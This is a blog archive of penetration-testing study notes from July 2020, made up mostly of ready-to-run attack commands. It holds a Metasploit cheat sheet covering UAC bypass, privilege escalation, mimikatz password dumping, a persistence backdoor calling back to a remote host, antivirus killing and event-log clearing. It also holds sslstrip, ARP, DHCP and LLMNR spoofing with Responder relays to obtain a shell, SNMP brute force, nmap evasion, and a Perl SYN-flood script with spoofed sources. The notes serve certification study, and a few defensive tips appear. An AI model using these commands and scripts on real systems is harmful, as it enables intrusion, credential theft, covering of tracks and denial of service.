Friday, July 31, 2020

[ICSI_CPT][metasploit] Privilege Escalation by disabling UAC

meterpreter > getsystem
Failed....

meterpreter > backgroup

msf > use exploit/windows/local/bypassuac

msf > set session X

msf > run

meterpreter > getsystem
Successful...

[ICSI_CPT]Check Windows Patches and Updates

Check the status of system patches and updates via CMD command:
cmd > wmic qfe get Caption,Description,HotFixID,InstalledOn

[certificate]ISO/IEC27001 Lead Auditor-2


Thursday, July 30, 2020

[eCPPT]Search sub-domains of a Top Level Domain

1) Google:
site:microsoft.com

2) Zone Transfer:
# host -l microsoft.com soa.microsoft.com

3) Shodan & Censys:
Shodan: search microsoft.com
Censys: search certificates related to microsoft.com

4) DNS Enumeration:
# dnsenum microsoft.com
# dnsrecon -d microsoft.com
# fierce -dns microsoft.com

Wednesday, July 29, 2020

[eCPPT]Detect Web services and their versions

1) whatweb
# whatweb http://www.microsoft.com/
# whatweb -v http://www.microsoft.com/

2) wappalyzer
It is an extension being able to be installed on FireFox and Chrome.

Sunday, July 26, 2020

[eCPPT][ICSI_CPT][Metasploit]Metasploit Cheat Sheet

Boot up Msfconsole:
# service postgresql start
# msfdb init
# msfconsole
msf > db_status

Search appropriate modules (some examples):
msf > search platform:Windows
msf > search platform:"Windows 7"
msf > search name:mysql
msf > search path:scada
msf > search author:jsmith
msf > search cve:2010-0249
msf > search cve:2011 author:jsmith platform:linux

Exploitation Procedure:
search -> use -> show options -> set -> show payloads -> set payload -> run

Migrate the process within Meterpreter for a stable purpose(P.S.:Suppose the PID of davcdata.exe is 2732):
meterpreter > ps
 ...
 2660  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2732  604   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.

A simple trial for privilege escalation(P.S.: for Windows victims only):
meterpreter > getsystem

Find appropriate privilege escalation exploits(P.S.:Suppose the existing session is 1):
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run

Privilege Escalation within Meterpreter(P.S.:Suppose MS10-015 vulnerability is applied and the existing session is 2):
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2

Retrieve passwords via Meterpreter:
meterpreter > load mimikatz
meterpreter > mimikatz_command -f sekurlsa::searchPassword
meterpreter > kerberos

Install a backdoor agent via Meterpreter for a persistent access:
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.0.224
Among others, "-U" represents the automatic execution of the backdoor agent, "-i 5" stands for an attempt to connect the backdoor server every 5 seconds if the connection fails, "-p 443" defines TCP443 as the remote port listening on the backdoor server, and "-r 192.168.0.224" specifies the IP address of the backdoor server, which is 192.168.0.224 in this case.

Clean Windows Event Logs through Meterpreter:
meterpreter > clearev

Post-exploitation commands(for Windows):
meterpreter > sysinfo
meterpreter > getuid
meterpreter > run post/windows/manage/migrate NAME=explorer.exe
meterpreter > run post/windows/manage/killav
meterpreter > run post/windows/gather/checkvm
meterpreter > run post/windows/manage/autoroute
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_ie
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/credentials/credentials_collector
meterpreter > run post/windows/gather/screen_spy
meterpreter > run post/windows/gather/enum_domain
meterpreter > run post/windows/gather/win_privs
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/multi/recon/local_exploit_suggester

Post-exploitation commands(for Linux):
meterpreter > sysinfo
meterpreter > run post/linux/gather/enum_configs
meterpreter > run post/linux/gather/enum_system
meterpreter > run post/linux/gather/enum_users_history
meterpreter > run post/multi/recon/local_exploit_suggester

AutoRun Post-exploitation commands:
1) Save the commands above into a rc file located at /root/autorun.rc
2) Enter the handler view, specify the corresponding options, and execute the following command:
msf handler > set AutoRunScript multi_console_command -rc /root/autorun.rc
msf handler > run

Post-exploitation for further exploration:
1) ARP Scan (PS: suppose the target network is 10.32.120.0/24):
meterpreter > run arp_scanner -r 10.32.120.0/24
2) Make the compromised PC as a router/jumpbox (PS: suppose the target network is 192.168.2.0/24, and the meterpreter session id is 1):
meterpreter > background
msf > route add 192.168.2.0 255.255.255.0 1
The updated routing table can be confirmed by executing the following command:
msf > route print
The target network can be scanned through the jumpbox now by executing the commands below:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 192.168.2.1
msf > set PORTS 1-1024
msf > run

Friday, July 24, 2020

Thursday, July 23, 2020

[ICSI_CPT] Host Discovery

Passive Discovery:
# netdiscover -p

Active Discovery:
# netdiscover -r 192.168.1.0/24
# nmap -sP 192.168.1.0/24

[ICSI_CPT][DNS] DNS Discovery

# host -l microsoft.com soa.microsoft.com
# dnsenum microsoft.com
# dnsrecon -d microsoft.com

[ICSI_CPT][eCPPT][Threat Intelligence] Shodan Hacking

Reference: https://developer.shodan.io/api
Update Date: July 23, 2020

data:
OLD IIS
"iis/5.0"
microsoft.com

city:
city:London
city:Singapore

country:
country:SG
country:US

geo [An example below: Devices within a 50km radius of San Diego (32.8,-117)]:
geo:32.8,-117,50

hostname:
hostname:test

net:
net:216.219.0.0/16

ip:
ip:8.8.4.4
ip:1.1.1.1

os:
os:windows
os:"windows 2003"

port:
port:445
port:135

before/after [An example below: Apache servers sitting in China and appearing during between March 22, 2010 and June 4, 2010]:
apache country:CN after:22/03/2010 before:04/06/2010

device:
device:router
device:webcam

Sunday, July 19, 2020

OS Configuration Security Review | Local Vulnerability Scan

[Windows:]

Policy Analyzer (Microsoft Security Compliance Toolkit)
https://www.microsoft.com/en-us/download/details.aspx?id=55319

Microsoft Baseline Security Analyzer (MBSA)
https://www.microsoft.com/en-us/download/details.aspx?id=19892


[Linux:]

OpenSCAP
https://www.open-scap.org/

Lynis
https://cisofy.com/lynis/

Saturday, July 18, 2020

[eCPPT][SSL][MITM] SSL Strip Attack

Comment: The following experimentation works well with Kali 2018.1. The reason why I don't use the newest version, namely 2020.X, is because the newest version has no sslstrip by default, and is tough to install python-twisted-web, which is required by sslstrip.

Running (In this case, 192.168.0.19 is the victim, 192.168.0.1 is the gateway, and TCP8080 is the listening port) :
# sysctl net.ipv4.ip_forward=1
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# sslstrip -a -f -l 8080 -w /root/sslstrip.log
Open a new terminal and type:
# arpspoof -i eth0 -t 192.168.0.19 -r 192.168.0.1

Harvest:
Open a new terminal and type:
# tail -n 30 -f /root/sslstrip.log

P.S.: This experimentation only succeeds when the victim's browser does not support HSTS.

Friday, July 17, 2020

[eCPPT][MITM]Bettercap to lauch ARP POISONING

Installation:
# apt-get update
# apt-get install bettercap

Execution:
# sysctl net.ipv4.ip_forward=1
# bettercap -iface wlan0

Tweaking:
The help command would show the status of modules:
>> help
Leverage "MODULE_NAME on/off" to turn on or shut down specific module:
>> arp.spoof on
>> net.sniff off

ARP Poisoning:
>> net.recon on
>> net.sniff on
>> arp.spoof on

Thursday, July 16, 2020

[eCPPT][MITM][Spoofing][Poisoning]LAN-Based Man In The Middle Attacks

1) MAC Flooding

Currently, most switches each can store 100,000,000 MAC addresses. As such, the following command can stuff the CAM table:
# sysctl net.ipv4.conf.all.forwarding=1
# macof -i eth0 -n 100000000
This attack is obsolete given that modern switches each can store a great quantity of MAC addresses.

Countermeasure:
- Port Security to limit the number of PCs connecting to each port
- IEEE 802.1x requiring connected PCs to forcibly authenticate their identities
- MAC Filtering only allowing authorized MAC addresses to communicate


2) ARP Poinsoning

In the scenario below, 192.168.0.1 is the gateway's IP address, and 192.168.0.7 is the victim's IP Address.
# sysctl net.ipv4.conf.all.forwarding=1
# arpspoof -i eth0 -t 192.168.0.7 -r 192.168.0.1
Then leverage WireShark to capture the confidential information.

More details can refer to the following two documents:
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on.html
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on_5.html

Countermeasure:
- Encryption In Transit and At Rest to withstand Man In The Middle and Interception
- Applying Static ARP to networks
- Leverage such integration solutions as CISCO DHCP Snooping and Dynamic ARP Inspection


3) DHCP Spoofing

Install Yersinia first:
# apt-get update
# apt-get install yersinia
Now start hacking:
# ifconfig eth0:1 192.168.1.1 netmask 255.255.255.0
# ifconfig eth0:1 up
# sysctl net.ipv4.ip_forward=1
Leverage the following steps to launch DHCP Starvation attack in order to exhaust the authorized DHCP server:
# yersinia -I
"i" -> Change to the network adapter "eth0" -> "q"
"F2" to change to DHCP mode
"x" -> "1"
And then start launching a rogue DHCP server:
"x" -> "2"
Fill out the following information before pressing the ENTER button to launch DHCP Spoofing attack:
Server ID: 192.168.001.001
Start IP: 192.168.001.100
End IP: 192.168.001.200
Lease Time (secs): 99999999
Renew Time (secs): 99999999
Subnet Mask: 255.255.255.000
Router: 192.168.001.001
DNS Server: 008.008.004.004
Domain: test.com
The next step is to allow the network created by the rogue DHCP server to access the legitimate networks by establishing a NAT rule, as shown below.
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
At the end, don't forget turning off the firewall if any.

Countermeasure:
- Give up DHCP and use static IP addresses instead
- Deploy NIDS-alike systems to monitor DHCP Starvation attack


4) LLMNR/NBT-NS Spoofing/Poisoning (Responder && MultiRelay)

Scenario #1:
When someone in the same WINDOWS domain makes a typo with an nonexistent hostname, the following command will capture the request, and respond with a fake response in order to gain the one's username and the hash of the one's password.
[Attacker Kali PC:]
# responder -I eth0
After gaining the username and hash:
# cd /usr/share/responder/logs
Apply john the ripper to the case as shown below:
# john ./SMB-NTLMv1-SSP-192.168.0.11.txt

Scenario #2:
If those PCs sitting in the WINDOWS network enable WPAD configuring proxy settings, the WPAD listener could be enabled to trick PCs' owners into typing their passwords, the attacker then can get the passwords without decrypting anything.
[Attacker Kali PC:]
# responder -I eth0 -wrFb

Scenario #3:
The Multi-Relay function of Responder could be applied when SMB Signing settings on the victim's PC is disabled.
[Attacker Kali PC:]
First determine if SMB Signing settings on the victim is disabled:
# /usr/share/responder/tools/RunFinger.py -i 192.168.0.11
After confirming that SMB Signing is disabled on the victim's PC, edit responder.conf and turn off SMB and HTTP services:
# vi /etc/responder/Responder.conf
SMB = Off
HTTP = Off
:wq
# responder -I eth0 --lm
The following command can help get a shell directly:
# /usr/share/responder/tools/MultiRelay.py -t 192.168.0.11 –u ALL

Countermeasure:
- Enable SMB Signing

Friday, July 10, 2020

[eCPPT][snmp]SNMP Hacking

[Server:]
For the server side, install a SNMPd through Docker:
# /etc/init.d/docker start
# docker run -d --name snmpd -p 161:161/udp polinux/snmpd


[Hacker:]
Confirm if the remote SNMP is working properly:
# nmap -sU -sV -n -p 161 192.168.0.253

Check what NMAP scripts could be used to get further information:
# ll /usr/share/nmap/scripts/|grep snmp
-rw-r--r-- 1 root root  7501 Mar 10 12:52 snmp-brute.nse
-rw-r--r-- 1 root root  4375 Mar 10 12:52 snmp-hh3c-logins.nse
-rw-r--r-- 1 root root  5216 Mar 10 12:52 snmp-info.nse
-rw-r--r-- 1 root root 28629 Mar 10 12:52 snmp-interfaces.nse
-rw-r--r-- 1 root root  5965 Mar 10 12:52 snmp-ios-config.nse
-rw-r--r-- 1 root root  4143 Mar 10 12:52 snmp-netstat.nse
-rw-r--r-- 1 root root  4418 Mar 10 12:52 snmp-processes.nse
-rw-r--r-- 1 root root  1854 Mar 10 12:52 snmp-sysdescr.nse
-rw-r--r-- 1 root root  2557 Mar 10 12:52 snmp-win32-services.nse
-rw-r--r-- 1 root root  2726 Mar 10 12:52 snmp-win32-shares.nse
-rw-r--r-- 1 root root  4700 Mar 10 12:52 snmp-win32-software.nse
-rw-r--r-- 1 root root  2003 Mar 10 12:52 snmp-win32-users.nse

Brute Force the community strings:
# nmap -sU -p 161 --script=snmp-brute.nse --script-args=snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.0.253
# hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.0.253

Take a chance to try the community string, "public", by using SNMP Walking:
# snmpwalk -v 2c 192.168.0.253 -c public

More clearly understand the target's settings via SNMP:
# snmp-check 192.168.0.253 -c public

Check an OID and modify it:
# snmpwalk -v 2c 192.168.0.253 -c public .iso.3.6.1.2.1.1.9.1.3.1
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
# snmpset -v 2c -c private 192.168.0.253 .iso.3.6.1.2.1.1.9.1.3.1 s "Test"

Wednesday, July 8, 2020

[eCPPT]SMB and RPC enumeration and mounting

Enumeration:
#enum4linux 192.168.0.191
#nbtstat -v 192.168.0.191
#rpcclient -N -U "" 192.168.0.191

Mount share drives:
#mount.cifs //192.168.0.191/C /media/C_share/ user=,pass=
#smbclient \\\\192.168.0.191\\C "welcome20XX" -U "TempUser"

Audit Linux command line

1) The script and scriptplay commands
tecmint@tecmint ~ $ script --timing=time.txt script.log
Script started, file is script.txt
tecmint@tecmint ~ $ exit
Script done, file is script.txt
tecmint@tecmint ~ $ scriptreplay --timing=time.txt script.log


2) The trap command:
$ trap 'echo "$USER":"$BASH_COMMAND" >>/path/to/log' DEBUG
$ uname
Linux
$ pwd
/home/dessert
$ hostname
dessert’s plowhorse
$ ls
dir1 file1 file2
$
$
$ bahs
No command 'bahs' found, did you mean:
 Command 'bash' from package 'bash' (main)
 Command 'bats' from package 'bats' (universe)
bahs: command not found
$ cat /path/to/log
dessert:uname
dessert:pwd
dessert:hostname
dessert:ls --color=auto
dessert:bahs
dessert:cat /path/to/log

Monday, July 6, 2020

[eCPPT][nmap]Scanning techniques for Firwall/IDS Evasion

1) Fragmentation
Utilize the parameters "-sS -f", such as:
#nmap -sS -f 192.168.0.1
This technique is obsoleted given that nearly all modern NIDSs can detect this kind of scanning.

2) Decoy
Use the parameters, "-sS -D", to make a couple of bogus IP addresses as fake scanners to confuse security anaylsts.
#nmap -sS -D 192.168.0.3,192.168.0.5,192.168.0.7,ME,192.168.0.11 192.168.0.251

3) Prolong the interval among scan requests
Apply "-T0" (5 minutes) or "-T1" (15 seconds) to the scan in order to hide the scanning activities.
#nmap -sS -p 25,80,443 -T0 192.168.0.1

4) Set Scanning Source Port as Famous Service Port
Change the source port of those scanning probes to a famous service port (e.g. 25, 80, or 443) by using a parameter, "-g".
#nmap -sS -g 25 192.168.0.1
#nmap -sU -g 53 192.168.0.251

5) Idle Scan
Utilize a zombie to scan a targeting host through leveraging a parameter, "-sI".
First, determine if a host (i.e. 192.168.0.251) can be a zombie:
#nmap -O -v -n 192.168.0.251
Second, if the zombie host is confirmed to be available, use it to scan the targeting host (i.e. 192.168.0.253):
#nmap -p22 -sI 192.168.0.251:443 192.168.0.253

Saturday, July 4, 2020

[nmap]syn_flood_through_nmap.pl

#!/usr/bin/perl -w
$|=1;

sub randomip(){
@digits = ();
for (0..3) {
push @digits, int (rand (255) + 1);
}
return join '.', @digits;
}
#print randomip(); #DEBUG

sub check_nmap(){
$result = sprintf(`which nmap`);
if(length($result)==0){
die "Please install Nmap.\n";
}
return;
}


&check_nmap();
print("Target IP address (e.g. 192.168.0.1): ");
$target_ip=<STDIN>;
chop($target_ip);
print("Target TCP port (e.g. 25): ");
$target_port=<STDIN>;
chop($target_port);
print("Network Interface sending out SYN (e.g. eth0): ");
$network_adapter=<STDIN>;
chop($network_adapter);


print("Launching SYN Flood...");

while(1){
$src_ip = &randomip();
system("nmap -e $network_adapter -Pn -sS -T5 -p $target_port -S $src_ip $target_ip");
}

exit(1);

Friday, July 3, 2020

Thursday, July 2, 2020

[eCPPT][nmap]Confirm if a remote machine can be used as a zombie

#nmap -O -v -n 192.168.0.1
OR (when you have already known which remote TCP port is open, such as TCP135 in the following example):
#nmap -O -v -n 135 10.50.97.10

Below shows that the aforementioned machine can be a zombie for Nmap's Idle Scan:
IP ID Sequence Generation: Incremental